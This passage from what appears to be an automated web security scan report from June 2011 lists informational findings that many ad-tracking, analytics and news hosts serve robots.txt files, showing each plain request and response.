P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

21.17. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Fri, 17 Jun 2011 10:51:03 GMT
Date: Thu, 16 Jun 2011 10:51:03 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

21.18. http://b.voicefive.com/b2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/b2

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Fri, 17 Jun 2011 12:51:27 GMT
Date: Thu, 16 Jun 2011 12:51:27 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

21.19. http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b3.mookie1.com

Response

21.20. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 20:19:44 GMT
Accept-Ranges: bytes
ETag: "0b02b30da1ac61:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 16 Jun 2011 15:52:10 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

21.21. http://c.betrad.com/a/n/273/1153.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.betrad.com
Path:	/a/n/273/1153.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "9152d7f1724ed8fbcd2e0c87029f193c:1276881254"
Last-Modified: Fri, 18 Jun 2010 17:14:14 GMT
Accept-Ranges: bytes
Content-Length: 25
Content-Type: text/plain
Date: Thu, 16 Jun 2011 14:39:50 GMT
Connection: close
X-N: S

User-agent: *
Disallow: /

21.22. http://c7.zedo.com/img/bh.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/img/bh.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Tue, 31 May 2005 07:08:00 GMT
ETag: "32e64b-4c-3f861aa21f400"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Date: Thu, 16 Jun 2011 11:29:29 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

21.23. http://cache.specificmedia.com/creative/blank.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cache.specificmedia.com
Path:	/creative/blank.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cache.specificmedia.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 14:39:51 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n30 ( iad-agg-n7), ht-d iad-agg-n7.panthercdn.com
ETag: "ffdde9-1a-44ed7e3e1bdc0"
Cache-Control: max-age=604800
Expires: Mon, 20 Jun 2011 16:43:10 GMT
Age: 251801
Content-Length: 26
Content-Type: text/plain
Last-Modified: Wed, 04 Jun 2008 14:17:35 GMT
Connection: close

User-agent: *
Disallow: /

21.24. http://cas.criteo.com/delivery/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cas.criteo.com
Path:	/delivery/afr.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cas.criteo.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Thu, 16 Jun 2011 13:08:01 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

21.25. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s93293816028162 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cctrkom.creditcards.com
Path:	/b/ss/ccardsccdc-us/1/H.17/s93293816028162

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cctrkom.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:39:35 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "2602fa-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www423
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

21.26. http://cdn.krxd.net/config/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.krxd.net
Path:	/config/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.krxd.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 13 May 2011 20:28:30 GMT
Server: Apache
X-Request-Time: D=263 t=1308223577560858
X-Served-By: logger014.krxd.net
Date: Thu, 16 Jun 2011 11:26:17 GMT
Content-Length: 26
Connection: close
X-N: S

User-agent: *
Disallow: /

21.27. http://cdn.turn.com/server/ddc.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.turn.com
Path:	/server/ddc.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Cache-Control: private, no-cache, no-store, must-revalidate
Date: Thu, 16 Jun 2011 12:06:48 GMT
Content-Length: 47
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

21.28. http://cdn5.tribalfusion.com/media/1956006/frame.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn5.tribalfusion.com
Path:	/media/1956006/frame.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn5.tribalfusion.com

Response

HTTP/1.0 200 OK
P3p: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
Content-Length: 26
X-Reuse-Index: 172
Content-Type: text/plain
Date: Thu, 16 Jun 2011 14:08:53 GMT
Connection: close

User-agent: *
Disallow: /

21.29. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: check4.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.43.151.59
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

21.30. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: check6.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.27.52.113
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

21.31. http://cheetah.vizu.com/i.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cheetah.vizu.com
Path:	/i.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cheetah.vizu.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 15:52:16 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n33 ( iad-agg-n34), ht-d iad-agg-n34.panthercdn.com
ETag: "3c053-1a-775728c0"
Cache-Control: max-age=604800
Expires: Sat, 18 Jun 2011 16:26:02 GMT
Age: 429974
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Last-Modified: Fri, 03 Jun 2011 22:42:19 GMT
Connection: close

User-agent: *
Disallow: /

21.32. http://citi.bridgetrack.com/usc/_spredir.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://citi.bridgetrack.com
Path:	/usc/_spredir.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: citi.bridgetrack.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 26 May 2011 20:07:36 GMT
Accept-Ranges: bytes
ETag: "2d6ce8ee01bcc1:0"
Server:
Date: Fri, 17 Jun 2011 10:45:19 GMT
Connection: close
Content-Length: 77

User-agent: *
Allow: /
Disallow: /track/
Disallow: /usc/_bt_appredir.asp

21.33. http://click.linksynergy.com/fs-bin/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://click.linksynergy.com
Path:	/fs-bin/click

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: click.linksynergy.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"28-1264098640000"
Last-Modified: Thu, 21 Jan 2010 18:30:40 GMT
Content-Type: text/plain
Content-Length: 28
Date: Fri, 17 Jun 2011 10:40:36 GMT
Connection: close

User-agent: *
Disallow: /

21.34. http://clickserve.cc-dt.com/link/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clickserve.cc-dt.com
Path:	/link/click

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clickserve.cc-dt.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:15 GMT
Server: Apache/1.3.41 (Unix)
P3P: policyref="http://www.performics.com/w3c/p3p/cc-dt/p3p.xml", CP="NOI DSP COR ADMa DEVa PSAa OUR BUS COM"
Last-Modified: Tue, 12 Jan 2010 15:57:03 GMT
Accept-Ranges: bytes
Content-Length: 194
Connection: close
Content-Type: text/plain

# disallow all spiders
User-agent: *
Disallow: /

# allow the Google Adwords link checker
User-agent: AdsBot-Google
Disallow:

# allow the MSN Adcenter link checker
User-agent: MSNPTC
Disallow:

21.35. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 16 Jun 2011 16:07:54 GMT
Server: Cookie Matcher
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

21.36. http://commerce.wsj.com/auth/forgotpass previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://commerce.wsj.com
Path:	/auth/forgotpass

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: commerce.wsj.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:24:18 GMT
Server: Apache
Last-Modified: Fri, 03 Aug 2007 21:00:35 GMT
ETag: "18-d9ae82c0"
Accept-Ranges: bytes
Content-Length: 24
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

21.37. http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/platinum/Visa/external/affiliate/Mar2011/default.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: creditcards.citicards.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 26 May 2011 20:07:36 GMT
Accept-Ranges: bytes
ETag: "2d6ce8ee01bcc1:0"
Server:
Date: Fri, 17 Jun 2011 10:40:29 GMT
Connection: close
Content-Length: 77

User-agent: *
Allow: /
Disallow: /track/
Disallow: /usc/_bt_appredir.asp

21.38. http://d7.zedo.com/img/bh.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/img/bh.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Date: Thu, 16 Jun 2011 11:28:58 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

21.39. http://dar.youknowbest.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dar.youknowbest.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dar.youknowbest.com

Response

HTTP/1.0 200 OK
Content-Length: 29
Content-Type: text/plain
Content-Location: http://dar.youknowbest.com/robots.txt
Last-Modified: Wed, 08 Dec 2010 17:37:14 GMT
Accept-Ranges: bytes
ETag: "01e78cfe96cb1:de5"
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server: CO-ADSWEB01
X-Powered-By: ASP.NET
Date: Thu, 16 Jun 2011 15:52:12 GMT
Connection: close

...User-agent: *
Disallow: /

21.40. http://dis.ny.us.criteo.com/dis/dis.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dis.ny.us.criteo.com
Path:	/dis/dis.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dis.ny.us.criteo.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Thu, 16 Jun 2011 13:08:10 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

21.41. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_2/StdBanner.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.serving-sys.com
Path:	/BurstingCachedScripts//SBTemplates_2_3_2/StdBanner.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 13:19:41 GMT
Server: Microsoft-IIS/6.0
Date: Thu, 16 Jun 2011 15:52:11 GMT
Content-Length: 28
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /

21.42. http://ev.ib-ibi.com/image.sbix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ev.ib-ibi.com
Path:	/image.sbix

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ev.ib-ibi.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Sat, 20 Nov 2010 00:06:06 GMT
Accept-Ranges: bytes
ETag: "9c851ba4688cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 16 Jun 2011 12:53:05 GMT
Connection: close
Content-Length: 937

...# robots.txt generated at http://www.mcanerin.com
User-agent: Googlebot
Disallow: /
User-agent: googlebot-image
Disallow: /
User-agent: googlebot-mobile
Disallow: /
User-agent: MSNBot
Disal
...[SNIP]...

21.43. http://feeds.bbci.co.uk/news/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Server: Apache
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=1740
Expires: Thu, 16 Jun 2011 12:55:54 GMT
Date: Thu, 16 Jun 2011 12:26:54 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...

21.44. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 16 Jun 2011 11:22:22 GMT
Server: Floodlight server
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

21.45. http://gan.doubleclick.net/gan_impression previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gan.doubleclick.net
Path:	/gan_impression

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gan.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 04 Dec 2010 02:47:35 GMT
Date: Thu, 16 Jun 2011 13:08:18 GMT
Expires: Thu, 16 Jun 2011 13:08:18 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

# disallow all spiders
User-agent: *
Disallow: /

# allow the Google Adwords link checker
User-agent: AdsBot-Google
Disallow:

# allow the MSN Adcenter link checker
User-agent: MSNPTC
Disallow:

21.46. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1049525132/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/viewthroughconversion/1049525132/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 16 Jun 2011 11:29:06 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

21.47. http://homedepot.ugc.bazaarvoice.com/static/1999q/r_5_ispacer.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homedepot.ugc.bazaarvoice.com
Path:	/static/1999q/r_5_ispacer.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: homedepot.ugc.bazaarvoice.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=ISO-8859-1
Date: Thu, 16 Jun 2011 11:33:26 GMT
Content-Length: 132
Connection: close

User-agent: *
Disallow: /bvs
Disallow: /rev
Disallow: /log
Disallow: /logging
Disallow: /logging?*

User-agent: kalooga
Disallow: /

21.48. http://img.mediaplex.com/content/0/17038/128465/Volcom___RCVA_300x250_Unisex_NA.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Volcom___RCVA_300x250_Unisex_NA.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:07:51 GMT
Server: Apache
Last-Modified: Sat, 10 Mar 2007 17:40:16 GMT
ETag: "1b1a-1a-42b5608766000"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /

21.49. http://imp.constantcontact.com/imp/cmp.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.constantcontact.com
Path:	/imp/cmp.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: imp.constantcontact.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 15 Dec 2010 19:24:31 GMT
ETag: "2500fe-1c-49777e2ee19c0"
Accept-Ranges: bytes
Content-Length: 28
Content-Type: text/plain; charset=UTF-8
Date: Thu, 16 Jun 2011 18:37:48 GMT
Connection: close

User-agent: *
Disallow: /

21.50. http://l.addthiscdn.com/live/t00/250lo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l.addthiscdn.com
Path:	/live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Jun 2011 11:39:23 GMT
ETag: "df8ab7-1b-4a51dabdf10c0"
Content-Type: text/plain; charset=UTF-8
Date: Thu, 16 Jun 2011 11:15:57 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

21.51. http://login.dotomi.com/ucm/UCMController previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://login.dotomi.com
Path:	/ucm/UCMController

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: login.dotomi.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:29:28 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2
X-Name: dmc-o04
Last-Modified: Tue, 23 Nov 2010 00:49:01 GMT
ETag: "10b0070-a2-495adbd151940"
Accept-Ranges: bytes
Content-Length: 162
Connection: close
Content-Type: text/plain

#do not edit this file in ms-platform, you need unix line seperators for it.
#this file will disallow any robots to search the dmc.
User-Agent: *
Disallow: /

21.52. http://media2.legacy.com/bind previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media2.legacy.com
Path:	/bind

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: media2.legacy.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 26

User-agent: *
Disallow: /

21.53. http://metrics.citibank.com/b/ss/citinaprod/1/H.22.1/s95367101319134 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.citibank.com
Path:	/b/ss/citinaprod/1/H.22.1/s95367101319134

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.citibank.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:39 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "322f76-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www3
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

21.54. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 17 Mar 2009 16:14:11 GMT
Server: Apache
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=80375519
Expires: Wed, 01 Jan 2014 18:58:53 GMT
Date: Thu, 16 Jun 2011 12:26:54 GMT
Connection: close

User-agent: *
Disallow: /

21.55. http://oc.creditcards.com/trans_node.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oc.creditcards.com
Path:	/trans_node.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: oc.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:18 GMT
Server: Apache
Last-Modified: Fri, 20 Feb 2009 18:56:12 GMT
ETag: "58c16a-1a-4635e34dfcb00"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /

21.56. http://oimg.nbcuni.com/b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s18412435774225 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oimg.nbcuni.com
Path:	/b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s18412435774225

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: oimg.nbcuni.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:26:25 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "69144-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www97
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

21.57. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s19508665378671 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://om.dowjoneson.com
Path:	/b/ss/djglobal,djwsj/1/H.20.3/s19508665378671

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: om.dowjoneson.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:22:22 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "7119e-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www411
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

21.58. http://online.wsj.com/djscript/latest/dijit/nls/loading.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://online.wsj.com
Path:	/djscript/latest/dijit/nls/loading.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: online.wsj.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:22:19 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 15:25:42 GMT
Accept-Ranges: bytes
Content-Length: 1471
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=5
Connection: Keep-Alive
Content-Type: text/plain

##ACAP version=1.0

User-agent: *
Disallow: /article_email/
Disallow: /article_print/
Disallow: /PA2VJBNA4R/
Disallow: /home/
Disallow: /advanced_search/
Disallow: /login/
Disallow: /acct/
D
...[SNIP]...

21.59. http://p.addthis.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p.addthis.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: p.addthis.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 16 Jun 2011 12:52:40 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

21.60. http://p.opt.fimserve.com/bht/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p.opt.fimserve.com
Path:	/bht/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: p.opt.fimserve.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1205261468000"
Last-Modified: Tue, 11 Mar 2008 18:51:08 GMT
Content-Type: text/plain
Content-Length: 26
Date: Thu, 16 Jun 2011 11:22:23 GMT
Connection: keep-alive

User-agent: *
Disallow: /

21.61. http://pagead2.googlesyndication.com/pagead/imgad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 16 Jun 2011 11:26:17 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

21.62. http://pbid.pro-market.net/engine previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pbid.pro-market.net
Path:	/engine

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pbid.pro-market.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: app3.ny
ETag: W/"27-1299672386000"
Last-Modified: Wed, 09 Mar 2011 12:06:26 GMT
Content-Type: text/plain
Content-Length: 27
